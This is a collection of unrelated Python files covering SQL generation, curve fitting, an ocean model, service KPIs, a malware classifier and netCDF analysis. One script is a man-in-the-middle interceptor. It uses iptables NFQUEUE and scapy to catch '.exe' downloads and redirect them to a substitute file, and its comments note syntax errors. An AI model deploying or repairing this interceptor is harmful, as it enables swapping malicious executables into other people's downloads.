            #             acol,bcol = bcol,acol
            #         elif t2 in table_alias_dict:
            #             old_t = t2
            #             new_t = t1
            #         else:
            #             ret = "{} join {} as T{} join {} as T{} on T{}.{}=T{}.{}".format(ret,table["table_names"][t1], idx,
            #                                                                           table["table_names"][t2],
            #                                                                           idx + 1, idx,
            #                                                                           table["column_names_original"][acol][1],
            #                                                                           idx + 1,
            #                                                                           table["column_names_original"][bcol][1])
            #             table_alias_dict[t1] = idx
            #             table_alias_dict[t2] = idx + 1
            #             idx += 2
            #             continue
            #         ret = "{} join {} as T{} on T{}.{}=T{}.{}".format(ret,new_t,idx,idx,table["column_names_original"][acol][1],
            #                                                           table_alias_dict[old_t],table["column_names_original"][bcol][1])
            #         table_alias_dict[new_t] = idx
            #         idx += 1
        # visited = set()
        candidate_tables = list(candidate_tables)
        start = candidate_tables[0]
        table_alias_dict[start] = idx
        idx += 1
        ret = "from {} as T1".format(table["table_names_original"][start])
        try:
            for end in candidate_tables[1:]:
                if end in table_alias_dict:
                    continue
                path = self.find_shortest_path(start, end, graph)
                prev_table = start
                if not path:
                    # Unreachable table: join without an ON condition.
                    table_alias_dict[end] = idx
                    idx += 1
                    ret = "{} join {} as T{}".format(
                        ret, table["table_names_original"][end], table_alias_dict[end], )
                    continue
                for node, (acol, bcol) in path:
                    if node in table_alias_dict:
                        prev_table = node
                        continue
                    table_alias_dict[node] = idx
                    idx += 1
                    ret = "{} join {} as T{} on T{}.{} = T{}.{}".format(
                        ret,
                        table["table_names_original"][node],
                        table_alias_dict[node],
                        table_alias_dict[prev_table],
                        table["column_names_original"][acol][1],
                        table_alias_dict[node],
                        table["column_names_original"][bcol][1])
                    prev_table = node
        except BaseException:
            traceback.print_exc()
            print("db:{}".format(table["db_id"]))
            # print(table["db_id"])
            return table_alias_dict, ret
        # if len(candidate_tables) != len(table_alias_dict):
        #     print("error in generate from clause!!!!!")
        return table_alias_dict, ret
    def gen_sql(self, sql, table):
        """Render a decoded nested-dict query into a SQL string.

        Recursively handles nested queries ("sql"/"nested_sql" wrapper
        keys and sub-queries appearing as condition values) and
        assembles the clauses in SELECT / FROM / WHERE / GROUP BY /
        ORDER BY / HAVING order, appending any set-operation tail
        (intersect / union / except).
        """
        select_clause = ""
        from_clause = ""
        groupby_clause = ""
        orderby_clause = ""
        having_clause = ""
        where_clause = ""
        nested_clause = ""
        cols = {}
        candidate_tables = set()
        nested_sql = {}
        nested_label = ""
        parent_sql = sql
        # if "sql" in sql:
        #     sql = sql["sql"]
        # Unwrap the query dict; remember any set-operation sibling.
        if "nested_label" in sql:
            nested_label = sql["nested_label"]
            nested_sql = sql["nested_sql"]
            sql = sql["sql"]
        elif "sql" in sql:
            sql = sql["sql"]
        # Collect every table referenced by a column tuple so gen_from
        # can build the join clause (-1 is the synthetic "all" table).
        for key in sql:
            if key not in KW_WITH_COL:
                continue
            for item in sql[key]:
                if isinstance(item, tuple) and len(item) == 3:
                    if table["column_names"][item[2]][0] != -1:
                        candidate_tables.add(table["column_names"][item[2]][0])
        table_alias_dict, from_clause = self.gen_from(candidate_tables, table)
        ret = []
        if "select" in sql:
            select_clause = self.gen_select(
                sql["select"], "select", table, table_alias_dict)
            if len(select_clause) > 0:
                ret.append(select_clause)
            else:
                print("select not found:{}".format(parent_sql))
        else:
            print("select not found:{}".format(parent_sql))
        if len(from_clause) > 0:
            ret.append(from_clause)
        if "where" in sql:
            where_clause = self.gen_where(
                sql["where"], table, table_alias_dict)
            if len(where_clause) > 0:
                ret.append(where_clause)
        if "groupBy" in sql:  # DEBUG-ed order
            groupby_clause = self.gen_group_by(
                sql["groupBy"], "group by", table, table_alias_dict)
            if len(groupby_clause) > 0:
                ret.append(groupby_clause)
        if "orderBy" in sql:
            orderby_clause = self.gen_orderby(
                sql["orderBy"], table, table_alias_dict)
            if len(orderby_clause) > 0:
                ret.append(orderby_clause)
        if "having" in sql:
            having_clause = self.gen_having(
                sql["having"], table, table_alias_dict)
            if len(having_clause) > 0:
                ret.append(having_clause)
        if len(nested_label) > 0:
            nested_clause = "{} {}".format(
                nested_label, self.gen_sql(
                    nested_sql, table))
            if len(nested_clause) > 0:
                ret.append(nested_clause)
        return " ".join(ret)
def check_acc(self, pred_sql, gt_sql):
    """Compare a predicted SQL string against the ground truth (stub, not implemented)."""
    pass
|
import numpy as np
from scipy.optimize import leastsq
import pylab as plt
def sinR():
    """Read time/voltage columns from 12_31_15.csv, then least-squares fit a
    sine curve to a hard-coded sample `data` series and plot the result.

    NOTE(review): the CSV columns read into timeA/voltageSet are currently
    unused by the fit — presumably `data` was meant to come from the file;
    confirm before relying on the plot.
    """
    timeA = []
    voltageSet = []
    # fixed: use a context manager so the file handle is always closed.
    with open("12_31_15.csv", 'r') as f:
        lineNum = 1
        for line in f:
            if lineNum == 1:
                # Skip the header row (station / station name).
                lineNum += 1
            elif lineNum == 2:
                timeA.append(line.split(",")[0])
                voltageSet.append(line.split(",")[1])

    data = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    # fixed: t must have the same length as data — the original used N = 100
    # sample points against 9 data values, so the residual in optimize_func
    # raised a broadcasting ValueError inside leastsq.
    N = len(data)  # number of data points
    t = np.linspace(0, 4*np.pi, N)

    guess_mean = np.mean(data)
    guess_std = 3*np.std(data)/(2**0.5)
    guess_phase = 0
    # fixed: Python 3 print function (was a Python 2 print statement).
    print(data)

    # First estimate from the raw moments; may already be good enough.
    data_first_guess = guess_std*np.sin(t+guess_phase) + guess_mean

    # Residual between the data and the parameterized sine we optimize.
    optimize_func = lambda x: x[0]*np.sin(t+x[1]) + x[2] - data
    est_std, est_phase, est_mean = leastsq(
        optimize_func, [guess_std, guess_phase, guess_mean])[0]

    # Recreate the fitted curve using the optimized parameters.
    data_fit = est_std*np.sin(t+est_phase) + est_mean
    plt.plot(data, '.')
    plt.plot(data_fit, label='after fitting')
    plt.plot(data_first_guess, label='first guess')
    plt.legend()
    plt.show()
|
import doublyPeriodic
import numpy as np; from numpy import pi
import time
class model(doublyPeriodic.numerics):
    """Single-vertical-mode hydrostatic Boussinesq equations linearized around
    a two-dimensional barotropic flow, on a doubly-periodic spectral grid.

    Prognostic spectral variables in soln[:, :, i]:
        0 = 2D vorticity q, 1 = wave velocity u, 2 = wave velocity v,
        3 = wave pressure p.
    """

    def __init__(
        self,
        name = "linearizedBoussinesqEquationsExample",
        # Grid parameters
        nx = 128,
        Lx = 2.0*pi,
        ny = None,
        Ly = None,
        # Solver parameters
        t = 0.0,
        dt = 1.0e-2,                    # Numerical timestep
        step = 0,
        timeStepper = "RK4",            # Time-stepping method
        nThreads = 1,                   # Number of threads for FFTW
        #
        # Near-inertial equation params: rotating and gravitating Earth
        f0 = 1.0,
        kappa = 4.0,
        # Friction: 4th order hyperviscosity
        waveVisc = 1.0e-4,
        waveViscOrder = 2.0,
        waveDiff = 1.0e-4,
        waveDiffOrder = 2.0,
        meanVisc = 1.0e-4,
        meanViscOrder = 2.0,
    ):
        # Initialize super-class.
        # fixed: the original called doublyPeriodicModel.__init__, a name that
        # is defined nowhere in this module (NameError); the declared base
        # class is doublyPeriodic.numerics.  NOTE(review): confirm the base
        # class accepts exactly these keyword arguments.
        doublyPeriodic.numerics.__init__(self,
            physics = "single-mode hydrostatic Boussinesq equations" + \
                " linearized around two-dimensional turbulence",
            nVars = 4,
            realVars = True,
            # Grid parameters
            nx = nx,
            ny = ny,
            Lx = Lx,
            Ly = Ly,
            # Solver parameters
            t = t,
            dt = dt,                        # Numerical timestep
            step = step,                    # Current step
            timeStepper = timeStepper,      # Time-stepping method
            nThreads = nThreads,            # Number of threads for FFTW
        )

        # Physical parameters specific to the physical problem
        self.name = name
        self.f0 = f0
        self.kappa = kappa
        self.meanVisc = meanVisc
        self.meanViscOrder = meanViscOrder
        self.waveVisc = waveVisc
        self.waveViscOrder = waveViscOrder
        self.waveDiff = waveDiff
        self.waveDiffOrder = waveDiffOrder

        # Initial routines: allocate arrays, build linear operators, stepper.
        self._init_parameters()
        self._set_linear_coeff()
        self._init_time_stepper()

        # Default vorticity initial condition: Gaussian vortex
        rVortex = self.Lx/20
        # fixed: exp was unqualified (NameError) — use np.exp.
        q0 = 0.1*self.f0 * np.exp( \
            - ( (self.XX-self.Lx/2.0)**2.0 + (self.YY-self.Ly/2.0)**2.0 ) \
            / (2*rVortex**2.0) \
        )

        # Default wave initial condition: plane wave with non-dim wavenumber 4.
        u, v, p = self.make_plane_wave(4)
        self.set_uvp(u, v, p)
        self.set_q(q0)
        self.update_state_variables()

    # Methods - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def describe_physics(self):
        """Print a human-readable description of the physics being solved."""
        print("""
            This model solves the Boussinesq equations linearized around \n
            a two-dimensional barotropic flow for a single vertical mode. \n
            No viscosity or dissipation can be specified, since this is not \n
            required to stabilize the wave-field solutions. Arbitrary-order \n
            hyperdissipation can be specified for the two-dimensional flow. \n
            There are four prognostic variables: the two-dimensional flow,
            the two horizontal velocity components u and v, and the pressure
            field. The chosen vertical mode is represented by the single \n
            parameter kappa, which is the square root of the eigenvalue \n
            from the vertical mode eigenproblem.
        """)

    def _set_linear_coeff(self):
        """ Calculate the coefficient that multiplies the linear left hand
            side of the equation """
        # Hyperviscous/hyperdiffusive damping: visc * |k|^order per variable.
        # Two-dimensional turbulent viscosity.
        self.linearCoeff[:, :, 0] = self.meanVisc \
            * (self.KK**2.0 + self.LL**2.0)**(self.meanViscOrder/2.0)
        self.linearCoeff[:, :, 1] = self.waveVisc \
            * (self.KK**2.0 + self.LL**2.0)**(self.waveViscOrder/2.0)
        self.linearCoeff[:, :, 2] = self.waveVisc \
            * (self.KK**2.0 + self.LL**2.0)**(self.waveViscOrder/2.0)
        self.linearCoeff[:, :, 3] = self.waveDiff \
            * (self.KK**2.0 + self.LL**2.0)**(self.waveDiffOrder/2.0)

    def _calc_right_hand_side(self, soln, t):
        """ Calculate the nonlinear right hand side of the PDE """
        # Views for clarity:
        qh = soln[:, :, 0]
        uh = soln[:, :, 1]
        vh = soln[:, :, 2]
        ph = soln[:, :, 3]

        # Physical-space fields
        self.q = self.ifft2(qh)
        self.u = self.ifft2(uh)
        self.v = self.ifft2(vh)
        self.p = self.ifft2(ph)

        # Calculate streamfunction (psi = -q / |k|^2, divide-safe at k=0)
        self.psih = -qh / self.divideSafeKay2

        # Mean velocities
        self.U = -self.ifft2(self.jLL*self.psih)
        self.V = self.ifft2(self.jKK*self.psih)

        # Mean velocity derivatives
        self.Ux = self.ifft2(self.LL*self.KK*self.psih)
        self.Uy = self.ifft2(self.LL**2.0*self.psih)
        self.Vx = -self.ifft2(self.KK**2.0*self.psih)

        # Local views to clarify the RHS expressions below
        U = self.U
        V = self.V
        q = self.q
        u = self.u
        v = self.v
        p = self.p
        Ux = self.Ux
        Uy = self.Uy
        Vx = self.Vx

        # Solely nonlinear advection for q
        self.RHS[:, :, 0] = - self.jKK*self.fft2(U*q) - self.jLL*self.fft2(V*q)

        # Linear terms + advection for u, v, p, + refraction for u, v
        self.RHS[:, :, 1] = self.f0*vh - self.jKK*ph \
            - self.jKK*self.fft2(U*u) - self.jLL*self.fft2(V*u) \
            - self.fft2(u*Ux) - self.fft2(v*Uy)
        self.RHS[:, :, 2] = -self.f0*uh - self.jLL*ph \
            - self.jKK*self.fft2(U*v) - self.jLL*self.fft2(V*v) \
            - self.fft2(u*Vx) + self.fft2(v*Ux)
        self.RHS[:, :, 3] = -self.cn**2.0 * ( self.jKK*uh + self.jLL*vh ) \
            - self.jKK*self.fft2(U*p) - self.jLL*self.fft2(V*p)

        self._dealias_RHS()

    def _init_parameters(self):
        """ Pre-allocate parameters in memory in addition to the solution """
        # Divide-safe square wavenumber: k=0 entry set to Inf so -q/|k|^2 -> 0.
        self.divideSafeKay2 = self.KK**2.0 + self.LL**2.0
        self.divideSafeKay2[0, 0] = float('Inf')

        # Mode-n wave speed:
        self.cn = self.f0 / self.kappa

        # Vorticity and wave-field amplitude
        self.q = np.zeros(self.physVarShape, np.dtype('float64'))
        self.u = np.zeros(self.physVarShape, np.dtype('float64'))
        self.v = np.zeros(self.physVarShape, np.dtype('float64'))
        self.p = np.zeros(self.physVarShape, np.dtype('float64'))

        # Streamfunction transform
        self.psih = np.zeros(self.specVarShape, np.dtype('complex128'))

        # Mean velocity components and their derivatives
        self.U = np.zeros(self.physVarShape, np.dtype('float64'))
        self.V = np.zeros(self.physVarShape, np.dtype('float64'))
        self.Ux = np.zeros(self.physVarShape, np.dtype('float64'))
        self.Uy = np.zeros(self.physVarShape, np.dtype('float64'))
        self.Vx = np.zeros(self.physVarShape, np.dtype('float64'))

    def update_state_variables(self):
        """ Update diagnostic variables to the current model state """
        # Views for clarity:
        qh = self.soln[:, :, 0]
        uh = self.soln[:, :, 1]
        vh = self.soln[:, :, 2]
        ph = self.soln[:, :, 3]

        # Streamfunction
        self.psih = - qh / self.divideSafeKay2

        # Physical-space PV and velocity components
        self.q = self.ifft2(qh)
        self.u = self.ifft2(uh)
        self.v = self.ifft2(vh)
        self.p = self.ifft2(ph)
        self.U = -self.ifft2(self.jLL*self.psih)
        self.V = self.ifft2(self.jKK*self.psih)

    def set_q(self, q):
        """ Set the model vorticity and refresh diagnostics """
        self.soln[:, :, 0] = self.fft2(q)
        self.soln = self._dealias_array(self.soln)
        self.update_state_variables()

    def make_plane_wave(self, kNonDim):
        """ Set linearized Boussinesq to a plane wave in x with speed 1 m/s
            and normalized wavenumber kNonDim """
        # Dimensional wavenumber and dispersion-relation frequency
        kDim = 2.0*pi/self.Lx * kNonDim
        # fixed: sqrt was unqualified (NameError) — use np.sqrt.
        sigma = self.f0*np.sqrt(1 + kDim/self.kappa)

        # Wave field amplitude.
        a = 1.0

        # A hydrostatic plane wave. s > sqrt(s^2+f^2)/sqrt(2) when s>f
        # fixed: cos/sin were unqualified (NameError) — use np.cos/np.sin.
        p = a * (sigma**2.0-self.f0**2.0) * np.cos(kDim*self.XX)
        u = a * kDim*sigma * np.cos(kDim*self.XX)
        v = a * kDim*self.f0 * np.sin(kDim*self.XX)

        return u, v, p

    def set_uvp(self, u, v, p):
        """ Set the linearized Boussinesq wave variables u, v and p """
        self.soln[:, :, 1] = self.fft2(u)
        self.soln[:, :, 2] = self.fft2(v)
        self.soln[:, :, 3] = self.fft2(p)
        self.soln = self._dealias_array(self.soln)
        self.update_state_variables()

    def plot_current_state(self):
        """ Create a simple plot that shows the state of the model."""
        import matplotlib.pyplot as plt

        self.update_state_variables()

        # Initialize colorbar dictionary
        colorbarProperties = {
            'orientation' : 'vertical',
            'shrink'      : 0.8,
            'extend'      : 'neither',
        }

        self.fig = plt.figure('Hydrostatic wave equation',
            figsize=(8, 4))

        # Left panel: vorticity; right panel: wave speed magnitude.
        ax1 = plt.subplot(121)
        plt.pcolormesh(self.xx, self.yy, self.q, cmap='RdBu_r')
        plt.axis('square')

        ax2 = plt.subplot(122)
        # fixed: sqrt was unqualified (NameError) — use np.sqrt.
        plt.pcolormesh(self.xx, self.yy, np.sqrt(self.u**2.0+self.v**2.0))
        plt.axis('square')

    def describe_model(self):
        """ Describe the current model state """
        print("\nThis is a doubly-periodic spectral model for \n" + \
                "{:s} \n".format(self.physics) + \
                "with the following attributes:\n\n" + \
                "   Domain       : {:.2e} X {:.2e} m\n".format(self.Lx, self.Ly) + \
                "   Resolution   : {:d} X {:d}\n".format(self.nx, self.ny) + \
                "   Timestep     : {:.2e} s\n".format(self.dt) + \
                "   Current time : {:.2e} s\n\n".format(self.t) + \
                "The FFT scheme uses {:d} thread(s).\n".format(self.nThreads))
|
from decimal import Decimal
from functools import total_ordering
import re
import itertools
from datetime import date
from dateutil.relativedelta import relativedelta
from helper import keyify, as_number
class Service:
    """One government service row from the transactions spreadsheet.

    Spreadsheet columns become attributes via keyify(); quarterly KPIs
    (take-up, cost, change factors) are derived in calculate_quarterly_kpis.
    """

    EXPECTED_QUARTERS = [
        # worked through oldest to newest to calculate %age changes
        '2012_q4',
        '2013_q1',
        '2013_q2',
        '2013_q3',
        '2013_q4',
        '2014_q1',
        '2014_q2',
        '2014_q3',
    ]
    COVERAGE_ATTRIBUTES = ['vol', 'digital_vol', 'cpt']
    # A marker used in the spreadsheet to show that a metric was not requested
    NOT_REQUESTED_MARKER = '***'

    def __init__(self, details):
        # Every raw spreadsheet column becomes an attribute.
        for key in details:
            setattr(self, keyify(key), details[key])
        self.has_kpis = False
        self.calculate_quarterly_kpis()
        self.keywords = self._split_keywords(details)

    def calculate_quarterly_kpis(self):
        """Build self.kpis: one dict per reported quarter, including change
        factors relative to the previous reported quarter."""
        self.kpis = []
        previous_quarter = None
        self.has_previous_quarter = False
        for quarter in self.EXPECTED_QUARTERS:
            volume = as_number(self['%s_vol' % quarter])
            if volume is None:
                # Quarter not reported at all: skip it entirely.
                continue
            digital_volume = as_number(self['%s_digital_vol' % quarter])
            if digital_volume == 0:
                takeup = 0
            elif digital_volume is not None and volume is not None:
                takeup = digital_volume / volume
            else:
                takeup = None
            cost_per_transaction = as_number(self['%s_cpt' % quarter])
            if cost_per_transaction is not None:
                cost = cost_per_transaction * volume
            else:
                cost = None
            data = {
                'quarter': Quarter.parse(quarter),
                'takeup': takeup,
                'cost': cost,
                'volume': self['%s_vol' % quarter],
                'volume_num': volume,
                'digital_volume': self['%s_digital_vol' % quarter],
                'digital_volume_num': digital_volume,
                'cost_per': self['%s_cpt' % quarter],
                'cost_per_number': cost_per_transaction,
                'cost_per_digital': self['%s_digital_cpt' % quarter],
                'completion': self['%s_completion_rate' % quarter],
                'satisfaction': self['%s_user_satisfaction' % quarter],
            }

            def change_factor(previous, current):
                # current/previous ratio, or None when either side is missing
                # or the division would be by zero.
                factor = None
                if current is not None and previous is not None and previous != 0:
                    factor = current / previous
                return factor

            if previous_quarter is not None:
                self.has_previous_quarter = True
                data['volume_change'] = change_factor(previous_quarter['volume_num'], volume)
                data['takeup_change'] = change_factor(previous_quarter['takeup'], takeup)
                data['cost_per_change'] = change_factor(previous_quarter['cost_per_number'], cost_per_transaction)
                data['cost_change'] = change_factor(previous_quarter['cost'], cost)
                data['previous_quarter'] = previous_quarter['quarter']
            previous_quarter = data
            self.kpis.append(data)
            self.has_kpis = True

    @property
    def name(self):
        # fixed: raw string — '\s' is an invalid escape in newer Pythons.
        return re.sub(r'\s*$', '', self.name_of_service)

    @property
    def body(self):
        return self.agency_body

    @property
    def agency_abbreviation(self):
        """Prefer the agency abbreviation; fall back to the full body name."""
        if self.agency_abbr is None or len(self.agency_abbr) == 0:
            return self.body
        else:
            return self.agency_abbr

    @property
    def description(self):
        # fixed: raw string — '\s' is an invalid escape in newer Pythons.
        return re.sub(r'\s*$', '', self.description_of_service)

    def latest_kpi_for(self, attribute):
        """Value of `attribute` in the most recent KPI dict, or None."""
        latest_kpis = self._most_recent_kpis
        if latest_kpis is None:
            return None
        else:
            return latest_kpis.get(attribute)

    @property
    def _most_recent_kpis(self):
        # Implicitly returns None when no quarter was ever reported.
        if len(self.kpis) > 0:
            return self.kpis[-1]

    @property
    def data_coverage(self):
        """Coverage of provided vs requested metric cells across all quarters."""
        def is_requested(attr):
            return str(self[attr]).lower() != self.NOT_REQUESTED_MARKER

        def is_provided(attr):
            return as_number(self[attr]) is not None

        # fixed: map()/filter() return lazy iterators on Python 3, so the
        # original len(...) calls raised TypeError; materialize lists instead.
        all_attrs = ['_'.join(pair) for pair in itertools.product(
            self.EXPECTED_QUARTERS, self.COVERAGE_ATTRIBUTES)]
        all_requested = [attr for attr in all_attrs if is_requested(attr)]
        all_provided = [attr for attr in all_requested if is_provided(attr)]
        return Coverage(len(all_provided), len(all_requested))

    def _attributes_present(self, kpi, attrs):
        return all(kpi[attr] is not None for attr in attrs)

    def find_recent_kpis_with_attributes(self, attrs):
        """Most recent KPI dict in which every attr is present, or None."""
        return next((kpi for kpi in reversed(self.kpis)
                     if self._attributes_present(kpi, attrs)),
                    None)

    @property
    def slug(self):
        # NOTE(review): slugify is not among this module's visible imports —
        # confirm it is provided elsewhere, otherwise this raises NameError.
        return slugify('%s-%s' % (self.abbr, self.name))

    @property
    def link(self):
        return '%s/%s' % ('service-details', self.slug)

    @property
    def has_details_page(self):
        return self.detailed_view == 'yes'

    @property
    def most_up_to_date_volume(self):
        most_recent_yearly_volume = None
        if self.has_kpis:
            most_recent_yearly_volume = self.latest_kpi_for('volume_num')
        return most_recent_yearly_volume

    def historical_data_before(self, quarter, key):
        """[{'quarter', 'value'}] for `key` in quarters before `quarter`,
        newest first, filtered to quarters where the backing metric exists."""
        # fixed: filter() yields an iterator on Python 3 and reversed() below
        # requires a sequence; use list comprehensions throughout.
        previous_kpis = [k for k in self.kpis if k['quarter'] < quarter]
        if key == 'cost_per_number' or key == 'cost':
            # Don't return cost_per_number or cost if cost_per_number is not provided
            previous_kpis = [elem for elem in previous_kpis if elem['cost_per_number'] is not None]
        elif key == 'takeup':
            # Don't return takeup value if digital_volume_num is not provided
            previous_kpis = [elem for elem in previous_kpis if elem['digital_volume_num'] is not None]
        return [{'quarter': k['quarter'], 'value': k.get(key)}
                for k in reversed(previous_kpis)]

    def __getitem__(self, key):
        # Dict-style access mirrors attribute access for keyified columns.
        return getattr(self, key)

    def _split_keywords(self, details):
        """Split the raw 'Keywords' cell into a stripped list (may be empty)."""
        if not details['Keywords']:
            return []
        return [x.strip() for x in details['Keywords'].split(',')]
@total_ordering
class Quarter:
    """A (year, quarter) pair that orders chronologically and renders as the
    12-month reporting window ending in that quarter."""

    month_abbreviations = [
        'Jan', 'Feb', 'Mar', 'Apr', 'May', 'June',
        'July', 'Aug', 'Sept', 'Oct', 'Nov', 'Dec'
    ]

    def __init__(self, year, quarter):
        self.year = year
        self.quarter = quarter

    def __str__(self):
        if self.year == 2012 and self.quarter == 4:
            # Exception for Q4 2012
            return "%s to %s" % (self.format_date(date(2011, 4, 1)), self.format_date(date(2012, 3, 1)))
        q = self.quarter * 3
        end_date = date(self.year, q, 1) - relativedelta(months=3)
        start_date = end_date - relativedelta(months=11)
        return "%s to %s" % (self.format_date(start_date), self.format_date(end_date))

    def __lt__(self, quarter):
        # total_ordering derives <=, >, >= from __lt__ and __eq__.
        return (self.year, self.quarter) < (quarter.year, quarter.quarter)

    def __eq__(self, quarter):
        return (self.year, self.quarter) == (quarter.year, quarter.quarter)

    def __hash__(self):
        # added: defining __eq__ sets __hash__ to None on Python 3; restore
        # hashing consistent with equality so Quarters can be dict/set keys.
        return hash((self.year, self.quarter))

    def __repr__(self):
        return '<Quarter year=%s quarter=%s>' % (self.year, self.quarter)

    @classmethod
    def format_date(cls, date):
        """Render a date as e.g. 'Apr 2013'."""
        return "%s %s" % (cls.month_abbreviations[date.month - 1], date.strftime('%Y'))

    @classmethod
    def parse(cls, str):
        """Parse a 'YYYY_qN' label (as used in spreadsheet columns)."""
        # fixed: raw string — '\d' is an invalid escape in newer Pythons.
        m = re.match(r'(\d\d\d\d)_q(\d)', str)
        return Quarter(int(m.group(1)), int(m.group(2)))
class Coverage(object):
    """How many requested data points were actually provided."""

    def __init__(self, provided, requested):
        self.provided = provided
        self.requested = requested

    @property
    def percentage(self):
        """Provided/requested as an exact Decimal fraction."""
        numerator = Decimal(self.provided)
        denominator = Decimal(self.requested)
        return numerator / denominator

    def __add__(self, other):
        """Combine two coverage tallies component-wise."""
        combined_provided = self.provided + other.provided
        combined_requested = self.requested + other.requested
        return Coverage(combined_provided, combined_requested)
|
#!/usr/bin/env python
#must run iptables -I INPUT -j NFQUEUE --queue-num 0 (use for packets whose destination is your computer)
#must run iptables -I OUTPUT -j NFQUEUE --queue-num 0 (use for packets whose source is your computer)
#>> must run iptables -I FORWARD -j NFQUEUE --queue-num 0 (use for packets being routed through your computer)
#>> in terminal: echo 1 > /proc/sys/net/ipv4/ip_forward
#can clear with iptables --flush
import netfilterqueue
import scapy.all as scapy
ack_list = []
def set_load(packet, load):
    """Overwrite the TCP payload of a scapy packet.

    Deletes the IP length and the IP/TCP checksums so scapy recomputes them
    when the packet is rebuilt; stale values would make it invalid.
    """
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet
def process_packet(packet):
    """NFQUEUE callback: watch HTTP traffic (lab/educational interceptor).

    Requests to port 80 mentioning ".exe" are remembered by their TCP ack;
    the matching response (by seq) has its payload replaced with a redirect.
    """
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == 80:
            # NOTE(review): on Python 3, .load is bytes, so `".exe" in ...`
            # raises TypeError — this was presumably written for Python 2.
            if ".exe" in scapy_packet[scapy.Raw].load:
                print(".exe request detected!")
                ack_list.append(scapy_packet[scapy.TCP].ack)
        elif scapy_packet[scapy.TCP].sport == 80:
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print("Replacing .exe file")
                # NOTE(review): the line below is a SyntaxError — it performs a
                # keyword-style assignment inside the call instead of passing
                # the response string as set_load's second argument.
                modified_packet = set_load(scapy_packet, scapy_packet[scapy.Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: http://www.example.com\n") #edit location of alternate file here
                packet.set_payload(str(modified_packet))
    packet.accept() #let packet out of queue
# Bind queue number 0 (matching the iptables rules above) and block in run().
# NOTE(review): the first line is a NameError — `queue` is never created; an
# assignment (`queue = netfilterqueue.NetfilterQueue()`) was clearly intended.
queue.netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
#!/usr/bin/env python
# coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Train/evaluate a random forest on the 456-feature malware dataset.
datasets = pd.read_csv('/home/aman/kans/work_folder/malware456.csv')
# Column 456 is the label; columns 0-455 are the feature vector.
Y = datasets.iloc[:, 456].values
X = datasets.iloc[:, 0:456].values
from sklearn.model_selection import train_test_split
# Hold out 25% of the rows for testing; fixed seed for reproducibility.
X_Train, X_Test, Y_Train, Y_Test = train_test_split(X, Y, test_size = 0.25, random_state = 0)
from sklearn.ensemble import RandomForestClassifier
classifier = RandomForestClassifier(n_estimators = 200, criterion = 'entropy', random_state = 0)
classifier.fit(X_Train,Y_Train)
Y_Pred = classifier.predict(X_Test)
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(Y_Test, Y_Pred)
from sklearn.metrics import accuracy_score
# NOTE(review): the return value below is discarded, and duplicates the
# classifier.score(X_Test, Y_Test) printed further down — print or remove it.
accuracy_score(Y_Test, Y_Pred)
print('Accuracy of Random Forestclassifier on training set: {:.2f}'
      .format(classifier.score(X_Train, Y_Train)))
print('Accuracy of Random Forest classifier on test set: {:.2f}'
      .format(classifier.score(X_Test, Y_Test)))
|
def longestPeak(array):
    """Return the length of the longest peak in `array`.

    A peak is a run of strictly increasing values immediately followed by a
    run of strictly decreasing values (so the minimum peak length is 3).
    Returns 0 when no peak exists.
    """
    best = 0
    n = len(array)
    idx = 1
    while idx < n - 1:
        # A tip is strictly greater than both neighbours.
        if not (array[idx - 1] < array[idx] > array[idx + 1]):
            idx += 1
            continue
        # Expand left over the strictly increasing slope.
        lo = idx - 2
        while lo >= 0 and array[lo] < array[lo + 1]:
            lo -= 1
        # Expand right over the strictly decreasing slope.
        hi = idx + 2
        while hi < n and array[hi] < array[hi - 1]:
            hi += 1
        best = max(best, hi - lo - 1)
        # Nothing before `hi` can start a new peak tip.
        idx = hi
    return best
|
# Demonstrates operator precedence and the augmented assignment operators.
number = 2 + 3 * 4 # 14 (multiplication binds tighter than addition)
print(number)
number = number + 2 # 16
print(number)
number += 2 # 18
print(number)
number *= 2 # 36
print(number)
number /= 2 # 18.0 — true division always yields a float in Python 3
print(number)
number -= 2 # 16.0
print(number)
number %= 2 # 0.0
print(number)
#!/bin/python2
### This ncfile is set up to compare the Mass Extinction Coefficients with
### internal vs. external mixing
from netCDF4 import Dataset
import numpy as np
#import scipy.ndimage
#import types
import sys as sys

### Read data files
# Sulfate volume fraction (%) to select from the 'vols' coordinate below.
volspkd = 10

# Open netCDF file
# File naming: im = internal (homogeneous) mixing, coat = core-shell mixing,
# em = external mixing; "3" files mix BC+SUL+OC, "2" files mix BC+SUL only.
ncfile_3im = 'bcm-sul-oc-im.nc'
ncfile_2im = 'bcm-sul-im-oc-em.nc'
ncfile_3cs = 'bcm-sul-oc-coat.nc'
ncfile_2cs = 'bcm-sul-coat-oc-em.nc'
fh_3im = Dataset(ncfile_3im, 'r')
fh_2im = Dataset(ncfile_2im, 'r')
fh_3cs = Dataset(ncfile_3cs, 'r')
fh_2cs = Dataset(ncfile_2cs, 'r')

# Read in coordinates (wavelength, sulfate vol %, OC vol %, relative humidity)
wl_orig = fh_3im.variables['wl'][:]
vols_orig = fh_3im.variables['vols'][:]
volo_orig = fh_3im.variables['volo'][:]
rh_orig = fh_3im.variables['RH'][:]

wlpkd = 0.55 # choose the wavelength at 550nm to represent shortwave radiation
# +/- 0.02 tolerance band; .item() assumes exactly one wavelength matches.
wlpkdind = np.where((wl_orig >= wlpkd-0.02) & (wl_orig <= wlpkd+0.02))[0].item()

# Read in data
# (The repeated [:][:][:] just re-slices the same array; [:] alone loads it.)
mec_3im_orig = fh_3im.variables['beta_e'][:][:][:]
mec_2im_orig = fh_2im.variables['beta_e'][:][:][:]
mec_3cs_orig = fh_3cs.variables['beta_e'][:][:][:]
mec_2cs_orig = fh_2cs.variables['beta_e'][:][:][:]
ssa_3im_orig = fh_3im.variables['ssa'][:][:][:]
ssa_2im_orig = fh_2im.variables['ssa'][:][:][:]
ssa_3cs_orig = fh_3cs.variables['ssa'][:][:][:]
ssa_2cs_orig = fh_2cs.variables['ssa'][:][:][:]
